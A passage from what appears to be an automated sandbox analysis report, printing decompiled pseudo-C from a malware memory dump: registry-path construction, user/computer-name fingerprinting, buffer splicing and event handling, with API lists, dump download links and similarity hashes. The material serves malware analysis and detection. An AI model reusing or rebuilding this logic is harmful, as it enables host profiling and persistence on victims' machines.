                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                    					_t60 = E04F6978C(0,  &_v284);
                                                                                                                                                                                                    					_a8 = _t60;
                                                                                                                                                                                                    					if(_t60 == 0) {
                                                                                                                                                                                                    						_v8 = 8;
                                                                                                                                                                                                    						L29:
                                                                                                                                                                                                    						_t61 = _a20;
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						return _v8;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t105 = _a24;
                                                                                                                                                                                                    					if(E04F6A0A7(_t97, _t105, _t96, _t60) != 0) {
                                                                                                                                                                                                    						L27:
                                                                                                                                                                                                    						E04F6677C(_a8);
                                                                                                                                                                                                    						goto L29;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t65 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    					_t16 = _t65 + 0x4f6e8fe; // 0x65696c43
                                                                                                                                                                                                    					_t68 = E04F6978C(0, _t16);
                                                                                                                                                                                                    					_a24 = _t68;
                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						_t29 = _t105 + 0x14; // 0x102
                                                                                                                                                                                                    						_t33 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    						if(E04F666BD( *_t33, _t96, _a8,  *0x4f6d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                    							_t72 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    							if(_t102 == 0) {
                                                                                                                                                                                                    								_t35 = _t72 + 0x4f6ea5f; // 0x4d4c4b48
                                                                                                                                                                                                    								_t73 = _t35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t34 = _t72 + 0x4f6e89f; // 0x55434b48
                                                                                                                                                                                                    								_t73 = _t34;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(E04F615EE( &_a24, _t73,  *0x4f6d334,  *0x4f6d338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                    								if(_t102 == 0) {
                                                                                                                                                                                                    									_t75 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    									_t44 = _t75 + 0x4f6e871; // 0x74666f53
                                                                                                                                                                                                    									_t78 = E04F6978C(0, _t44);
                                                                                                                                                                                                    									_t103 = _t78;
                                                                                                                                                                                                    									if(_t78 == 0) {
                                                                                                                                                                                                    										_v8 = 8;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t47 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    										E04F65931( *_t47, _t96, _a8,  *0x4f6d338, _a24);
                                                                                                                                                                                                    										_t49 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    										E04F65931( *_t49, _t96, _t103,  *0x4f6d330, _a16);
                                                                                                                                                                                                    										E04F6677C(_t103);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t40 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    									E04F65931( *_t40, _t96, _a8,  *0x4f6d338, _a24);
                                                                                                                                                                                                    									_t43 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    									E04F65931( *_t43, _t96, _a8,  *0x4f6d330, _a16);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								if( *_t105 != 0) {
                                                                                                                                                                                                    									E04F6677C(_a24);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									 *_t105 = _a16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t21 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    					if(E04F663A4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                    						_t104 = _v16;
                                                                                                                                                                                                    						_t88 = 0x28;
                                                                                                                                                                                                    						if(_v12 == _t88) {
                                                                                                                                                                                                    							 *_t104 =  *_t104 & 0x00000000;
                                                                                                                                                                                                    							_t26 = _t105 + 0x10; // 0x3d04f6c0
                                                                                                                                                                                                    							E04F666BD( *_t26, _t96, _a8, _a24, _t104);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						E04F6677C(_t104);
                                                                                                                                                                                                    						_t102 = _a16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E04F6677C(_a24);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                    					goto L29;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					memcpy( &_v284, _a8, _t102);
                                                                                                                                                                                                    					__imp__(_t106 + _t102 - 0x117,  *0x4f6d33c);
                                                                                                                                                                                                    					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                                                                                                                                    					_t96 = 0x80000003;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x04f66791
                                                                                                                                                                                                    0x04f6679a
                                                                                                                                                                                                    0x04f667a1
                                                                                                                                                                                                    0x04f667a6
                                                                                                                                                                                                    0x04f66815
                                                                                                                                                                                                    0x04f6681b
                                                                                                                                                                                                    0x04f66820
                                                                                                                                                                                                    0x04f66829
                                                                                                                                                                                                    0x04f6682e
                                                                                                                                                                                                    0x04f66833
                                                                                                                                                                                                    0x04f669a7
                                                                                                                                                                                                    0x04f669ae
                                                                                                                                                                                                    0x04f669ae
                                                                                                                                                                                                    0x04f669b3
                                                                                                                                                                                                    0x04f669b5
                                                                                                                                                                                                    0x04f669b5
                                                                                                                                                                                                    0x04f669be
                                                                                                                                                                                                    0x04f669be
                                                                                                                                                                                                    0x04f66839
                                                                                                                                                                                                    0x04f66845
                                                                                                                                                                                                    0x04f6699d
                                                                                                                                                                                                    0x04f669a0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f669a0
                                                                                                                                                                                                    0x04f6684b
                                                                                                                                                                                                    0x04f66850
                                                                                                                                                                                                    0x04f66859
                                                                                                                                                                                                    0x04f6685e
                                                                                                                                                                                                    0x04f66863
                                                                                                                                                                                                    0x04f668ad
                                                                                                                                                                                                    0x04f668ad
                                                                                                                                                                                                    0x04f668c0
                                                                                                                                                                                                    0x04f668ca
                                                                                                                                                                                                    0x04f668d0
                                                                                                                                                                                                    0x04f668d7
                                                                                                                                                                                                    0x04f668e1
                                                                                                                                                                                                    0x04f668e1
                                                                                                                                                                                                    0x04f668d9
                                                                                                                                                                                                    0x04f668d9
                                                                                                                                                                                                    0x04f668d9
                                                                                                                                                                                                    0x04f668d9
                                                                                                                                                                                                    0x04f66903
                                                                                                                                                                                                    0x04f6690b
                                                                                                                                                                                                    0x04f66939
                                                                                                                                                                                                    0x04f6693e
                                                                                                                                                                                                    0x04f66947
                                                                                                                                                                                                    0x04f6694c
                                                                                                                                                                                                    0x04f66950
                                                                                                                                                                                                    0x04f66982
                                                                                                                                                                                                    0x04f66952
                                                                                                                                                                                                    0x04f6695f
                                                                                                                                                                                                    0x04f66962
                                                                                                                                                                                                    0x04f66972
                                                                                                                                                                                                    0x04f66975
                                                                                                                                                                                                    0x04f6697b
                                                                                                                                                                                                    0x04f6697b
                                                                                                                                                                                                    0x04f6690d
                                                                                                                                                                                                    0x04f6691a
                                                                                                                                                                                                    0x04f6691d
                                                                                                                                                                                                    0x04f6692f
                                                                                                                                                                                                    0x04f66932
                                                                                                                                                                                                    0x04f66932
                                                                                                                                                                                                    0x04f6698c
                                                                                                                                                                                                    0x04f66998
                                                                                                                                                                                                    0x04f6698e
                                                                                                                                                                                                    0x04f66991
                                                                                                                                                                                                    0x04f66991
                                                                                                                                                                                                    0x04f6698c
                                                                                                                                                                                                    0x04f66903
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f668ca
                                                                                                                                                                                                    0x04f66872
                                                                                                                                                                                                    0x04f6687c
                                                                                                                                                                                                    0x04f6687e
                                                                                                                                                                                                    0x04f66883
                                                                                                                                                                                                    0x04f66887
                                                                                                                                                                                                    0x04f66889
                                                                                                                                                                                                    0x04f66894
                                                                                                                                                                                                    0x04f66897
                                                                                                                                                                                                    0x04f66897
                                                                                                                                                                                                    0x04f6689d
                                                                                                                                                                                                    0x04f668a2
                                                                                                                                                                                                    0x04f668a2
                                                                                                                                                                                                    0x04f668a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f668a8
                                                                                                                                                                                                    0x04f667ab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f667d2
                                                                                                                                                                                                    0x04f667dd
                                                                                                                                                                                                    0x04f667f3
                                                                                                                                                                                                    0x04f667f9
                                                                                                                                                                                                    0x04f66801
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f66801

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • StrChrA.SHLWAPI(04F64D4E,0000005F,00000000,00000000,00000104), ref: 04F667C4
                                                                                                                                                                                                    • memcpy.NTDLL(?,04F64D4E,?), ref: 04F667DD
                                                                                                                                                                                                    • lstrcpy.KERNEL32(?), ref: 04F667F3
                                                                                                                                                                                                      • Part of subcall function 04F6978C: lstrlen.KERNEL32(?,00000000,04F6D330,00000001,04F63435,04F6D00C,04F6D00C,00000000,00000005,00000000,00000000,?,?,?,04F6568F,04F65073), ref: 04F69795
                                                                                                                                                                                                      • Part of subcall function 04F6978C: mbstowcs.NTDLL ref: 04F697BC
                                                                                                                                                                                                      • Part of subcall function 04F6978C: memset.NTDLL ref: 04F697CE
                                                                                                                                                                                                      • Part of subcall function 04F65931: lstrlenW.KERNEL32(04F64D4E,?,?,04F66967,3D04F6C0,80000002,04F64D4E,04F62227,74666F53,4D4C4B48,04F62227,?,3D04F6C0,80000002,04F64D4E,?), ref: 04F65951
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 04F66815
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                    • API String ID: 2598994505-2967466578
                                                                                                                                                                                                    • Opcode ID: f4fc6acb5cc39cec913b98bbb961fe494e1df489a72b2346bd08649234339a2a
                                                                                                                                                                                                    • Instruction ID: e96cdc0a00e91ca9f2902d1101b93fff18069cb71ac14584c3e5987e3e46e6ca
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4fc6acb5cc39cec913b98bbb961fe494e1df489a72b2346bd08649234339a2a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4513F7660020AFFEF119FA4ED40E9A7BB9EF48314F048514F91AD6160D736F926EB10
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F626A0() {
                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                    				signed int _t47;
                                                                                                                                                                                                    				short _t51;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				int _t56;
                                                                                                                                                                                                    				int _t57;
                                                                                                                                                                                                    				char* _t64;
                                                                                                                                                                                                    				short* _t67;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                    				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                    				_t39 = _v8;
                                                                                                                                                                                                    				if(_t39 != 0) {
                                                                                                                                                                                                    					_v12 = _t39;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                    					_t43 = _v8;
                                                                                                                                                                                                    					if(_t43 != 0) {
                                                                                                                                                                                                    						_v12 = _v12 + _t43 + 2;
                                                                                                                                                                                                    						_t64 = E04F68D59(_v12 + _t43 + 2 << 2);
                                                                                                                                                                                                    						if(_t64 != 0) {
                                                                                                                                                                                                    							_t47 = _v12;
                                                                                                                                                                                                    							_t67 = _t64 + _t47 * 2;
                                                                                                                                                                                                    							_v8 = _t47;
                                                                                                                                                                                                    							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                    								E04F6677C(_t64);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t51 = 0x40;
                                                                                                                                                                                                    								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                                                                                    								_t52 = _v8;
                                                                                                                                                                                                    								_v12 = _v12 - _t52;
                                                                                                                                                                                                    								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                                                                                    									goto L7;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t56 = _v12 + _v8;
                                                                                                                                                                                                    									_t31 = _t56 + 2; // 0x4f61e0d
                                                                                                                                                                                                    									_v12 = _t56;
                                                                                                                                                                                                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                                                                                    									_v8 = _t57;
                                                                                                                                                                                                    									if(_t57 == 0) {
                                                                                                                                                                                                    										goto L7;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64[_t57] = 0;
                                                                                                                                                                                                    										_v16 = _t64;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x04f626ae
                                                                                                                                                                                                    0x04f626b1
                                                                                                                                                                                                    0x04f626b4
                                                                                                                                                                                                    0x04f626ba
                                                                                                                                                                                                    0x04f626bf
                                                                                                                                                                                                    0x04f626c5
                                                                                                                                                                                                    0x04f626cd
                                                                                                                                                                                                    0x04f626d0
                                                                                                                                                                                                    0x04f626d6
                                                                                                                                                                                                    0x04f626db
                                                                                                                                                                                                    0x04f626e8
                                                                                                                                                                                                    0x04f626f5
                                                                                                                                                                                                    0x04f626f9
                                                                                                                                                                                                    0x04f626fb
                                                                                                                                                                                                    0x04f626ff
                                                                                                                                                                                                    0x04f62702
                                                                                                                                                                                                    0x04f62712
                                                                                                                                                                                                    0x04f62765
                                                                                                                                                                                                    0x04f62766
                                                                                                                                                                                                    0x04f62714
                                                                                                                                                                                                    0x04f62719
                                                                                                                                                                                                    0x04f6271a
                                                                                                                                                                                                    0x04f6271f
                                                                                                                                                                                                    0x04f62722
                                                                                                                                                                                                    0x04f62735
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62737
                                                                                                                                                                                                    0x04f6273a
                                                                                                                                                                                                    0x04f6273f
                                                                                                                                                                                                    0x04f6274d
                                                                                                                                                                                                    0x04f62750
                                                                                                                                                                                                    0x04f62756
                                                                                                                                                                                                    0x04f6275b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6275d
                                                                                                                                                                                                    0x04f6275d
                                                                                                                                                                                                    0x04f62760
                                                                                                                                                                                                    0x04f62760
                                                                                                                                                                                                    0x04f6275b
                                                                                                                                                                                                    0x04f62735
                                                                                                                                                                                                    0x04f6276b
                                                                                                                                                                                                    0x04f6276c
                                                                                                                                                                                                    0x04f626db
                                                                                                                                                                                                    0x04f62772

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,04F61E0B), ref: 04F626B4
                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,04F61E0B), ref: 04F626D0
                                                                                                                                                                                                      • Part of subcall function 04F68D59: RtlAllocateHeap.NTDLL(00000000,00000000,04F69099), ref: 04F68D65
                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,04F61E0B), ref: 04F6270A
                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(04F61E0B,?), ref: 04F6272D
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04F61E0B,00000000,04F61E0D,00000000,00000000,?,?,04F61E0B), ref: 04F62750
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3850880919-0
                                                                                                                                                                                                    • Opcode ID: 72bf2318a9aa3b696d5cbf766233cf0b75098e5edd3da43345a525cce24f7c9d
                                                                                                                                                                                                    • Instruction ID: 515f371525d9ed0a0ccc2ea8d9ef1e0539772b0938e45f53f0b21d95fd19be2e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72bf2318a9aa3b696d5cbf766233cf0b75098e5edd3da43345a525cce24f7c9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21B876900208FFDB11DFE9D984DAEBBB8EF48704B5144AAE502E7241EA34AB45DB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E04F657EF(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				char _t28;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                    				int _t51;
                                                                                                                                                                                                    				int _t54;
                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t49 = _a4;
                                                                                                                                                                                                    				_t55 = __eax;
                                                                                                                                                                                                    				_v12 = 0xb;
                                                                                                                                                                                                    				if(_t49 != 0 && __eax != 0) {
                                                                                                                                                                                                    					_t5 = _t55 - 1; // -1
                                                                                                                                                                                                    					_t42 = _t49 + _t5;
                                                                                                                                                                                                    					_t28 =  *_t42;
                                                                                                                                                                                                    					_v5 = _t28;
                                                                                                                                                                                                    					 *_t42 = 0;
                                                                                                                                                                                                    					__imp__(_a8, _t41);
                                                                                                                                                                                                    					_v16 = _t28;
                                                                                                                                                                                                    					_t50 =  *0x4f6d114(_t49, _a8);
                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                    						 *_t42 = _v5;
                                                                                                                                                                                                    						_t44 = RtlAllocateHeap( *0x4f6d238, 0, _a16 + __eax);
                                                                                                                                                                                                    						if(_t44 == 0) {
                                                                                                                                                                                                    							_v12 = 8;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t51 = _t50 - _a4;
                                                                                                                                                                                                    							memcpy(_t44, _a4, _t51);
                                                                                                                                                                                                    							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                                                                                                                                                                                    							_t45 = _v16;
                                                                                                                                                                                                    							_t54 = _a16;
                                                                                                                                                                                                    							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                                                                                                                                                                                    							 *_a20 = _t44;
                                                                                                                                                                                                    							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                    							 *_a24 = _t55 - _v16 + _t54;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                    			}
















                                                                                                                                                                                                    0x04f657f7
                                                                                                                                                                                                    0x04f657fa
                                                                                                                                                                                                    0x04f657fc
                                                                                                                                                                                                    0x04f65805
                                                                                                                                                                                                    0x04f65817
                                                                                                                                                                                                    0x04f65817
                                                                                                                                                                                                    0x04f6581b
                                                                                                                                                                                                    0x04f6581d
                                                                                                                                                                                                    0x04f65820
                                                                                                                                                                                                    0x04f65823
                                                                                                                                                                                                    0x04f6582c
                                                                                                                                                                                                    0x04f65836
                                                                                                                                                                                                    0x04f6583a
                                                                                                                                                                                                    0x04f6583f
                                                                                                                                                                                                    0x04f65855
                                                                                                                                                                                                    0x04f65859
                                                                                                                                                                                                    0x04f658aa
                                                                                                                                                                                                    0x04f6585b
                                                                                                                                                                                                    0x04f6585b
                                                                                                                                                                                                    0x04f65863
                                                                                                                                                                                                    0x04f65872
                                                                                                                                                                                                    0x04f65877
                                                                                                                                                                                                    0x04f65887
                                                                                                                                                                                                    0x04f6588d
                                                                                                                                                                                                    0x04f65898
                                                                                                                                                                                                    0x04f658a2
                                                                                                                                                                                                    0x04f658a6
                                                                                                                                                                                                    0x04f658a6
                                                                                                                                                                                                    0x04f65859
                                                                                                                                                                                                    0x04f658b1
                                                                                                                                                                                                    0x04f658b8

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04F65823
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6584F
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04F65863
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04F65872
                                                                                                                                                                                                    • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04F6588D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                    • Opcode ID: 897558e39332baddd1d0fd0721fd9e6ff6b934463d6913895333805c485d9603
                                                                                                                                                                                                    • Instruction ID: b9e1076d78832f59df46cad0d0f8db77076b4554093da7793cba2add2be25ec9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 897558e39332baddd1d0fd0721fd9e6ff6b934463d6913895333805c485d9603
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C21AC76A00249BFDF028FA8DC44A9EBFB9EF85304F058054EC49AB304C775E916CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E04F68CE0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				long _t10;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t9 = __eax;
                                                                                                                                                                                                    				_t22 = __eax;
                                                                                                                                                                                                    				if(_a4 != 0 && E04F6552D(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t10 = E04F6A934(_t9, _t18, _t22, _a8);
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                    					ResetEvent( *(_t22 + 0x20));
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0xffffffff);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                                                                                                                                                                    					if( *0x4f6d12c() != 0) {
                                                                                                                                                                                                    						SetEvent( *(_t22 + 0x1c));
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t10 = GetLastError();
                                                                                                                                                                                                    						if(_t10 == 0x3e5) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t10 = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == 0xffffffff) {
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x04f68ce0
                                                                                                                                                                                                    0x04f68ced
                                                                                                                                                                                                    0x04f68cef
                                                                                                                                                                                                    0x04f68d52
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f68d52
                                                                                                                                                                                                    0x04f68d07
                                                                                                                                                                                                    0x04f68d0e
                                                                                                                                                                                                    0x04f68d1a
                                                                                                                                                                                                    0x04f68d1f
                                                                                                                                                                                                    0x04f68d21
                                                                                                                                                                                                    0x04f68d23
                                                                                                                                                                                                    0x04f68d25
                                                                                                                                                                                                    0x04f68d27
                                                                                                                                                                                                    0x04f68d29
                                                                                                                                                                                                    0x04f68d35
                                                                                                                                                                                                    0x04f68d45
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f68d37
                                                                                                                                                                                                    0x04f68d37
                                                                                                                                                                                                    0x04f68d3e
                                                                                                                                                                                                    0x04f68d4b
                                                                                                                                                                                                    0x04f68d4b
                                                                                                                                                                                                    0x04f68d4b
                                                                                                                                                                                                    0x04f68d3e
                                                                                                                                                                                                    0x04f68d35
                                                                                                                                                                                                    0x04f68d50
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f68d56

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04F63331,?,?,00000000,00000000), ref: 04F68D1A
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 04F68D1F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 04F68D37
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000102,04F63331,?,?,00000000,00000000), ref: 04F68D52
                                                                                                                                                                                                      • Part of subcall function 04F6552D: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04F68CFF,?,?,?,?,00000102,04F63331,?,?,00000000), ref: 04F65539
                                                                                                                                                                                                      • Part of subcall function 04F6552D: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F68CFF,?,?,?,?,00000102,04F63331,?), ref: 04F65597
                                                                                                                                                                                                      • Part of subcall function 04F6552D: lstrcpy.KERNEL32(00000000,00000000), ref: 04F655A7
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 04F68D45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
